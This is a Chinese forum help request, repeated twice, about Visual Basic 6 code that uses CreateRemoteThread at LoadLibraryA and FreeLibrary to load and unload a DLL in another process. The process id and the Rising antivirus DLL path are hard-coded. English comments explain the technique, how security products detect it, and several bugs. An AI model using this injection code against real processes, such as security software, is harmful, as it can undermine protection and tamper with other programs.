以前看到chenhui530写的一个贴子,但是我还是不太会用,希望得到指教
Option Explicit

' --- Access rights requested from OpenProcess ---
' Together these allow allocating/writing memory and creating a thread in
' another process. OpenProcess grants them only when this process is
' permitted to act on the target, and this exact combination is one that
' AV/EDR products monitor as a remote-thread injection indicator.
Private Const PROCESS_CREATE_THREAD = &H2
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_VM_OPERATION = &H8

' --- VirtualAllocEx / VirtualFreeEx flags ---
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H4

' WaitForSingleObject timeout: block until the handle is signalled.
Private Const INFINITE = &HFFFFFFFF

' --- kernel32 declarations ---
' Allocate / free a region inside another process's address space.
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
    lpAddress As Any, _
    ByVal dwSize As Long, _
    ByVal flAllocationType As Long, _
    ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, _
    lpAddress As Any, _
    ByVal dwSize As Long, _
    ByVal dwFreeType As Long) As Long
' Open a process by id with the requested access mask (0 = handle not inheritable).
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Copy a buffer from this process into another process.
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' Resolve an export of a module loaded in *this* process; the module
' functions below use the result as a start address in the target, which
' relies on kernel32 being mapped at the same base there.
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
' Start a thread in another process at lpStartAddress with lpParameter.
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' Declared but not referenced anywhere in this module.
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
' Read a finished thread's exit code (used to fetch the remote thread's return value).
Private Declare Function GetExitCodeThread Lib "kernel32" (ByVal hThread As Long, lpExitCode As Long) As Long

' Asks process dwProcessId to load the DLL at pszLibFile: opens the
' process, copies the path into its memory, then starts a remote thread
' whose start address is kernel32!LoadLibraryA. This is the classic
' remote-thread DLL load sequence that security products hook and alert
' on; it only works when OpenProcess grants the rights requested below.
' Returns the remote thread's exit code (LoadLibraryA's return value in
' the target), or 0 when any step fails.
' NOTE(review): the error handler and the normal cleanup share the
' errhandle label, so failures are silently swallowed and reported as 0.
Private Function loadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String) As Long
    Dim hProcess As Long, hThread As Long
    Dim pszLibFileRemote As Long, exitCode As Long
    On Error GoTo errhandle
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
        PROCESS_CREATE_THREAD Or _
        PROCESS_VM_OPERATION Or _
        PROCESS_VM_WRITE, _
        0, dwProcessId)
    If hProcess = 0 Then GoTo errhandle
    Dim cch As Long, cb As Long
    ' ANSI byte length of the path plus the terminating NUL; LoadLibraryA
    ' reads an ANSI string, hence the vbFromUnicode conversion.
    cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
    cb = cch
    ' Reserve a buffer for the path inside the target and copy it there.
    pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
    If pszLibFileRemote = 0 Then GoTo errhandle
    If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
    Dim pfnThreadRtn As Long
    ' Address of LoadLibraryA as seen from this process; used as the remote
    ' start address on the assumption kernel32 shares a base with the target.
    pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
    If pfnThreadRtn = 0 Then GoTo errhandle
    hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pfnThreadRtn, pszLibFileRemote, 0, ByVal 0&)
    If (hThread = 0) Then GoTo errhandle
    ' Blocks this thread until the remote thread ends; a stalled target
    ' hangs this program because no timeout is applied.
    WaitForSingleObject hThread, INFINITE
    GetExitCodeThread hThread, exitCode
    loadmode = exitCode
errhandle:
    ' Reached on success and on failure: release the remote buffer and
    ' both handles so nothing leaks in either process.
    If pszLibFileRemote <> 0 Then _
        VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
    If hThread <> 0 Then _
        CloseHandle hThread
    If hProcess <> 0 Then _
        CloseHandle hProcess
End Function
' Button handler: loads a hard-coded DLL into the process with the
' hard-coded id 3200 and then asks that process to free it again.
' NOTE(review): loadmode is invoked twice here (once standalone, once to
' produce the third argument), so the target's reference count on the
' module is incremented twice while unloadmode frees it only once.
Private Sub Command1_Click()
    loadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll"
    ' The third argument is simply the value loadmode returns (the remote
    ' LoadLibraryA result), which unloadmode hands to FreeLibrary as modeH.
    unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")
End Sub

' Counterpart of loadmode: starts a remote thread at kernel32!FreeLibrary
' in process dwProcessId, passing modeH (the module handle obtained from
' loadmode) as the thread parameter. Same process-access requirements and
' detection profile as loadmode.
' NOTE(review): the result is stored in the local injectlibB but never
' assigned to unloadmode, so this function always returns 0.
' NOTE(review): pszLibFile is copied into the target exactly as in
' loadmode although FreeLibrary takes a module handle, not a path.
Private Function unloadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String, ByVal modeH As Long) As Long
    Dim hProcess As Long, hThread As Long
    Dim pszLibFileRemote As Long, exitCode As Long
    Dim injectlibB   ' untyped (Variant); only ever written, never read
    On Error GoTo errhandle
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
        PROCESS_CREATE_THREAD Or _
        PROCESS_VM_OPERATION Or _
        PROCESS_VM_WRITE, _
        0, dwProcessId)
    If hProcess = 0 Then GoTo errhandle
    Dim cch As Long, cb As Long
    ' ANSI byte length of the path plus the terminating NUL.
    cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
    cb = cch
    pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
    If pszLibFileRemote = 0 Then GoTo errhandle
    If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
    Dim pfnThreadRtn As Long
    ' Address of FreeLibrary as seen from this process.
    pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
    If pfnThreadRtn = 0 Then GoTo errhandle
    ' 16 KiB stack requested for the remote thread (loadmode passes 0 for
    ' the default size).
    hThread = CreateRemoteThread(hProcess, ByVal 0&, 1024 * 16, ByVal pfnThreadRtn, ByVal modeH, 0, pszLibFileRemote)
    If (hThread = 0) Then GoTo errhandle
    ' No timeout: a stalled target hangs this program.
    WaitForSingleObject hThread, INFINITE
    GetExitCodeThread hThread, exitCode
    injectlibB = exitCode
errhandle:
    ' Reached on success and on failure: release the remote buffer and handles.
    If pszLibFileRemote <> 0 Then _
        VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
    If hThread <> 0 Then _
        CloseHandle hThread
    If hProcess <> 0 Then _
        CloseHandle hProcess
End Function
主要有两个问题
1,unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")中第三个参数是什么意思呢?
2,据作者自己说少了一个ByVal,不知是哪个地方少了一个ByVal.
不知还有没有更好的方法,谢谢
Option Explicit

' --- Access rights requested from OpenProcess ---
' Together these allow allocating/writing memory and creating a thread in
' another process. OpenProcess grants them only when this process is
' permitted to act on the target, and this exact combination is one that
' AV/EDR products monitor as a remote-thread injection indicator.
Private Const PROCESS_CREATE_THREAD = &H2
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_VM_OPERATION = &H8

' --- VirtualAllocEx / VirtualFreeEx flags ---
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H4

' WaitForSingleObject timeout: block until the handle is signalled.
Private Const INFINITE = &HFFFFFFFF

' --- kernel32 declarations ---
' Allocate / free a region inside another process's address space.
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
    lpAddress As Any, _
    ByVal dwSize As Long, _
    ByVal flAllocationType As Long, _
    ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, _
    lpAddress As Any, _
    ByVal dwSize As Long, _
    ByVal dwFreeType As Long) As Long
' Open a process by id with the requested access mask (0 = handle not inheritable).
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Copy a buffer from this process into another process.
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' Resolve an export of a module loaded in *this* process; the module
' functions below use the result as a start address in the target, which
' relies on kernel32 being mapped at the same base there.
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
' Start a thread in another process at lpStartAddress with lpParameter.
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' Declared but not referenced anywhere in this module.
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
' Read a finished thread's exit code (used to fetch the remote thread's return value).
Private Declare Function GetExitCodeThread Lib "kernel32" (ByVal hThread As Long, lpExitCode As Long) As Long

' Asks process dwProcessId to load the DLL at pszLibFile: opens the
' process, copies the path into its memory, then starts a remote thread
' whose start address is kernel32!LoadLibraryA. This is the classic
' remote-thread DLL load sequence that security products hook and alert
' on; it only works when OpenProcess grants the rights requested below.
' Returns the remote thread's exit code (LoadLibraryA's return value in
' the target), or 0 when any step fails.
' NOTE(review): the error handler and the normal cleanup share the
' errhandle label, so failures are silently swallowed and reported as 0.
Private Function loadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String) As Long
    Dim hProcess As Long, hThread As Long
    Dim pszLibFileRemote As Long, exitCode As Long
    On Error GoTo errhandle
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
        PROCESS_CREATE_THREAD Or _
        PROCESS_VM_OPERATION Or _
        PROCESS_VM_WRITE, _
        0, dwProcessId)
    If hProcess = 0 Then GoTo errhandle
    Dim cch As Long, cb As Long
    ' ANSI byte length of the path plus the terminating NUL; LoadLibraryA
    ' reads an ANSI string, hence the vbFromUnicode conversion.
    cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
    cb = cch
    ' Reserve a buffer for the path inside the target and copy it there.
    pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
    If pszLibFileRemote = 0 Then GoTo errhandle
    If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
    Dim pfnThreadRtn As Long
    ' Address of LoadLibraryA as seen from this process; used as the remote
    ' start address on the assumption kernel32 shares a base with the target.
    pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
    If pfnThreadRtn = 0 Then GoTo errhandle
    hThread = CreateRemoteThread(hProcess, ByVal 0&, 0&, ByVal pfnThreadRtn, pszLibFileRemote, 0, ByVal 0&)
    If (hThread = 0) Then GoTo errhandle
    ' Blocks this thread until the remote thread ends; a stalled target
    ' hangs this program because no timeout is applied.
    WaitForSingleObject hThread, INFINITE
    GetExitCodeThread hThread, exitCode
    loadmode = exitCode
errhandle:
    ' Reached on success and on failure: release the remote buffer and
    ' both handles so nothing leaks in either process.
    If pszLibFileRemote <> 0 Then _
        VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
    If hThread <> 0 Then _
        CloseHandle hThread
    If hProcess <> 0 Then _
        CloseHandle hProcess
End Function
' Button handler: loads a hard-coded DLL into the process with the
' hard-coded id 3200 and then asks that process to free it again.
' NOTE(review): loadmode is invoked twice here (once standalone, once to
' produce the third argument), so the target's reference count on the
' module is incremented twice while unloadmode frees it only once.
Private Sub Command1_Click()
    loadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll"
    ' The third argument is simply the value loadmode returns (the remote
    ' LoadLibraryA result), which unloadmode hands to FreeLibrary as modeH.
    unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")
End Sub

' Counterpart of loadmode: starts a remote thread at kernel32!FreeLibrary
' in process dwProcessId, passing modeH (the module handle obtained from
' loadmode) as the thread parameter. Same process-access requirements and
' detection profile as loadmode.
' NOTE(review): the result is stored in the local injectlibB but never
' assigned to unloadmode, so this function always returns 0.
' NOTE(review): pszLibFile is copied into the target exactly as in
' loadmode although FreeLibrary takes a module handle, not a path.
Private Function unloadmode(ByVal dwProcessId As Long, ByVal pszLibFile As String, ByVal modeH As Long) As Long
    Dim hProcess As Long, hThread As Long
    Dim pszLibFileRemote As Long, exitCode As Long
    Dim injectlibB   ' untyped (Variant); only ever written, never read
    On Error GoTo errhandle
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION Or _
        PROCESS_CREATE_THREAD Or _
        PROCESS_VM_OPERATION Or _
        PROCESS_VM_WRITE, _
        0, dwProcessId)
    If hProcess = 0 Then GoTo errhandle
    Dim cch As Long, cb As Long
    ' ANSI byte length of the path plus the terminating NUL.
    cch = 1 + LenB(StrConv(pszLibFile, vbFromUnicode))
    cb = cch
    pszLibFileRemote = VirtualAllocEx(hProcess, 0&, cb, MEM_COMMIT, PAGE_READWRITE)
    If pszLibFileRemote = 0 Then GoTo errhandle
    If (WriteProcessMemory(hProcess, pszLibFileRemote, ByVal pszLibFile, cb, ByVal 0&) = 0) Then GoTo errhandle
    Dim pfnThreadRtn As Long
    ' Address of FreeLibrary as seen from this process.
    pfnThreadRtn = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
    If pfnThreadRtn = 0 Then GoTo errhandle
    ' 16 KiB stack requested for the remote thread (loadmode passes 0 for
    ' the default size).
    hThread = CreateRemoteThread(hProcess, ByVal 0&, 1024 * 16, ByVal pfnThreadRtn, ByVal modeH, 0, pszLibFileRemote)
    If (hThread = 0) Then GoTo errhandle
    ' No timeout: a stalled target hangs this program.
    WaitForSingleObject hThread, INFINITE
    GetExitCodeThread hThread, exitCode
    injectlibB = exitCode
errhandle:
    ' Reached on success and on failure: release the remote buffer and handles.
    If pszLibFileRemote <> 0 Then _
        VirtualFreeEx hProcess, pszLibFileRemote, 0, MEM_RELEASE
    If hThread <> 0 Then _
        CloseHandle hThread
    If hProcess <> 0 Then _
        CloseHandle hProcess
End Function
主要有两个问题
1,unloadmode 3200, "C:\Program Files\Rising\Rav\rscommon.dll", loadmode(3200, "C:\Program Files\Rising\Rav\rscommon.dll")中第三个参数是什么意思呢?
2,据作者自己说少了一个ByVal,不知是哪个地方少了一个ByVal.
不知还有没有更好的方法,谢谢